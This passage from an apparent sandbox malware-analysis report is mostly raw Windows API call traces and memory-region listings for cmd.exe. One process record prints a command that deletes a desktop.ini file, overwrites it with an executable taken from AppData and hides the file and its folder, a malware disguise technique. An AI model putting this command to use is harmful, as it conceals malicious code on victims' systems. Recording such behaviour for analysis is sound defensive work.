lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.919] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.919] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] GetFileType (hFile=0x4c) returned 0x1 [0131.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.920] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.920] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.920] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.921] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] GetFileType (hFile=0x4c) returned 0x1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.921] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.922] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.922] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x32, 
lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] GetFileType (hFile=0x4c) returned 0x1 [0131.922] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.922] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x32, lpOverlapped=0x0) returned 1 [0131.922] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.922] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.922] _close (_FileHandle=4) returned 0 [0131.923] FindNextFileW (in: hFindFile=0x3f0e90, lpFindFileData=0x2cf134 | out: lpFindFileData=0x2cf134) returned 0 [0131.923] GetLastError () returned 0x12 [0131.923] FindClose (in: hFindFile=0x3f0e90 | out: hFindFile=0x3f0e90) returned 1 [0131.923] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0131.924] _close (_FileHandle=3) returned 0 [0131.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.924] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.924] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.924] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.924] SetConsoleInputExeNameW () returned 0x1 [0131.924] GetConsoleOutputCP () returned 0x1b5 [0131.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.924] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.925] exit (_Code=0) Process: id = "111" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xaa4" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12069 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12070 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12071 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12072 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 12073 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12074 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = 
mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12075 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12076 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12077 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 12078 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12171 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12172 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12173 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12174 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 12175 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 12176 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12177 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file 
name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12178 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12179 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12180 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12181 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12182 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12183 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12184 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12185 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12186 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 
"c:\\windows\\system32\\imm32.dll") Region: id = 12187 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12188 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 12189 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 12190 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12191 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 12192 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 12193 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 12194 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 12243 start_va = 0x13a0000 end_va = 0x166efff entry_point = 0x13a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 168 os_tid = 0xaa0 [0131.801] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8cc | out: lpSystemTimeAsFileTime=0x2cf8cc*(dwLowDateTime=0x887ef7a0, dwHighDateTime=0x1d440a9)) [0131.801] GetCurrentProcessId () returned 0xaa4 [0131.801] GetCurrentThreadId () returned 0xaa0 [0131.801] GetTickCount () returned 0x29fc7 [0131.801] QueryPerformanceCounter (in: 
lpPerformanceCount=0x2cf8c4 | out: lpPerformanceCount=0x2cf8c4*=18859058747) returned 1 [0131.802] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.802] __set_app_type (_Type=0x1) [0131.802] __p__fmode () returned 0x76b331f4 [0131.802] __p__commode () returned 0x76b331fc [0131.802] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.802] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.802] GetCurrentThreadId () returned 0xaa0 [0131.802] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaa0) returned 0x38 [0131.802] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.802] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.802] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.803] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.803] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf85c | out: phkResult=0x2cf85c*=0x0) returned 0x2 [0131.803] VirtualQuery (in: lpAddress=0x2cf893, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, 
State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.803] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf82c, dwLength=0x1c | out: lpBuffer=0x2cf82c*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xd0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0131.803] GetConsoleOutputCP () returned 0x1b5 [0131.803] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.803] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.803] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.803] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.803] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.803] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.804] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.804] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.804] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.804] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.804] GetEnvironmentStringsW () returned 0x3b0508* [0131.804] FreeEnvironmentStringsW (penv=0x3b0508) returned 1 [0131.804] GetEnvironmentStringsW () returned 0x3b0508* [0131.804] FreeEnvironmentStringsW (penv=0x3b0508) returned 1 [0131.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7cc | out: phkResult=0x2ce7cc*=0x40) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", 
lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0xb8, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x0, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.804] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegCloseKey (hKey=0x40) returned 0x0 [0131.805] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7cc | out: phkResult=0x2ce7cc*=0x40) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, 
lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x40, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x0, lpData=0x2ce7d8*=0x1, lpcbData=0x2ce7d0*=0x1000) returned 0x2 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x0, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x9, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: lpType=0x2ce7d4*=0x4, lpData=0x2ce7d8*=0x9, lpcbData=0x2ce7d0*=0x4) returned 0x0 [0131.805] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7d4, lpData=0x2ce7d8, lpcbData=0x2ce7d0*=0x1000 | out: 